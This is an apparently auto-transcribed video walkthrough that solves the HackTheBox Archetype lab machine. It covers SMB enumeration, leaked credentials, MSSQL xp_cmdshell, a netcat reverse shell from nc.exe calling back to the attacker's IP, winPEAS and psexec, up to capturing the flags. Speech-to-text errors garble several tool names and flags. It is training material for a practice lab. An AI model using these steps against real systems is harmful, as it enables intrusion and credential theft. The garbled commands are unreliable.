Hello guys, so in this video we will be solving the Archetype machine from HackTheBox Starting Point tier number 2. I have already spawned it, so let's start with the mmap scan. So for that I'll get as root. And I'll do mmap -p- to scan all ports -sc to use default scripts -sv to detect services under version -T and 4 to adjust the timing for the scan and then min rate 5000 to make it faster. Like this it will only list the ports that transmit 5000 packets per second or more. Then -pn to disable host discovery. I'll paste the address and then I'll export it to the all ports. To the all ports file. Okay, so the scan has finished and I have opened the file. This is the command I use, and right here we can see there are quite a few ports. We've got like 135, 139, but the most interesting is this one, 1433, running on TCP, which is running an SQL server. So now that we know that there's an SQL server, let's try and connect with SMB client. I'll just do it as root better. And so now SMB client dash capital N dash capital L, and then the IP address. This will list all of the shares that are actively running. And so we've got 4 of them. The most interesting is that, and the one that we will probably have access to is the one called backups. So let's try that. And so SMB client -n, and then 4 backward slashes, the IP address, another 2 backward slashes, and then the name of the share. In this case is backups. And if we hit enter, we get access to it. So now we can type help to see all of the commands. But let's type ls, and there's a file right here. So let's get the file with just get and the name of the file. And so now if we exit this, we should have the file right there. Let's see what's in there. So let's, and we see right here that we have a password and a user right here. So let's just copy this and create a file with it. So we have it right here. Now what we can do is use a tool that comes with impacket that is called SQL client.py, and depends on the version you have. It might be .py, It may be .py or just MSQL client. It comes with impacket, and then we just need to do this right here. Put the IP address, but the username, so let's just copy it and paste the username. So if we hit enter, everything should work just fine. It asks for a password. Let's see the credentials file. The password is megacorp123. Okay, so I'll just copy it. And we should get access now. Yes, we do get access, and we can type help to see the commands. And as you can see right here, we can actually enable the xpcmd shell, which will allow us to run normal command shell commands from here. So let's enable it. cmd shell. Okay, now we have to write reconfigure, and now let's try if it works. cmd shell, and now here you can type a command. I'll just type who am I, and it works. It gives us the username that we are running the command as. And so now there's a file right here that is called nc.exe. It's a tool for pen testing, mainly used for pen testing, that you can use as a listening device on your computer. So you can set up a port and then do a repair shell. We could try that. And so to do that, we first need to get that file. So right here, I'll do Python 3 and run an HTTP server on port 80. And now we can do this. And so PowerShell -g to run a PowerShell command, and then cd c users sql sbc downloads. And then like this to run another command, and then wget http. And so that we need to get our IP address, so I'll just do ifconfig right here. Is the tune 0 interface, so I just grab it, paste the IP address, and then /nc.exe, and then -out file to nc.exe to save it as nc.exe. So now should technically work. Well, it doesn't, because I think right here is just one slash, I'm not sure. No, it is not this. Let's just say is if I put the user correctly. Yes, so yeah, it problem here is we need to put a port, so no, not this. Oh, sorry, right here is the problem. Okay, so now it's done. So now we can type again this, and we just delete this till here, and then we need to create right here. We can stop the server. As you can see here, someone has successfully gotten the file. Close this, and then what we can do is we need to use NC on our computer for netcat, and we will have it listening right here on port 444. Here you can choose whichever port you want, as long as it's not being used by another server. So if it's a free port, you can use it. So I'll just put it there running, and then right here we need to run like this the file. So nc.exe, and then cmd.exe dash e dot exe cmd.exe, and then our IP address, and then two dots, and the port you've chosen. I've chosen port 4444, so I'll put that. And this what it will basically do by running this with this option is send a cmd to that to our machine. So now if it works correctly, sorry. Okay, sorry. The problem here is that you do not put two dots right here. You just space it. Just put the port. So right now here, when we are running netcat, we have now a CMD, as you can see. So now we need to go to PowerShell. So just type PowerShell, and PowerShell will start. And so now we actually need to get a file that I've got right here. Okay, it's right here is this is WinPiece. You can use it for detect vulnerabilities in uncertain misconfigurations in a machine in order to gain privileges, to escalate privileges. And so now we need to run again a Python server. So I'll get as root and run the server with python 3 -m http.server and 80 to put the port, and now wget sorry, http to / our IP address on port no yeah, and then slash wimpiece tongue64.exe. I'll leave the link to these files in the description, and then dash out file as I'll just put wimpiece altogether.exe to make it easier later. So sorry, wget http to / the IP address slash, well, let's see actually how it's running. Let's copy the name. Okay, slash win piece tongue 64. Okay, .exe dash out file to wimpiece.exe. So here I'll start again the server, and now should work fine. Yes, someone just got the file. We can see here the IP is our target IP, and so now we need to run wimpiece. So if we type there, we can see here we've got wimpiece.exe. So to run it, just /wimpiece.exe. I'll close this with no longer needed. So there were a few mistakes there. I don't know really what happened, but if you see the file, you can see right here that we've got a username and a password. So I will copy that, and now I will right here create a file called credentials admin .t. No, doesn't matter. And I will paste that. And so now what we can use, I think we can stop this. We no longer need it, as well as this. We no longer need it. I'll just exit. But now we can use a tool. Okay, called PSSEG. Okay, this no. Yeah, it's PSSEG. Py, no. The tool is psx.py. It depends on the version you have. Again, maybe you need to run the installer. I think it's in user bin impacket, something like that, or just psx or psx.py. Depends on the version, and then all you need to do is just, if we see the credentials, we can see the user is administrator, so you just type administrator, the symbol, and then the IP address, which is the target IP. So I'll copy it and paste it right here. Administrator, you hit enter, and that should do it. Well, it asks for the password, and I'll just copy it. Okay, so I got back this, and so we can just type ctc users, or just even better, 2 dots, and now there, and we can go to desktop, and if we type there again, we can see the user flag. So type user.txt. This is the user flag. I will copy it and paste it here, and then the root flag, which, if I'm not mistaken, I have here. So no, I actually haven't copied it yet, so just come here, close this, and then ps. Okay, let's go. The password, just put it correctly, put the good password, and we are good to go in a second. Right now, so ctc users administrator, and then desktop. Now type root.txt, and we get it right here. We just paste the root flag, and that's it. The machine has been pawned. Thank you so much for watching, and see you in the next walkthrough.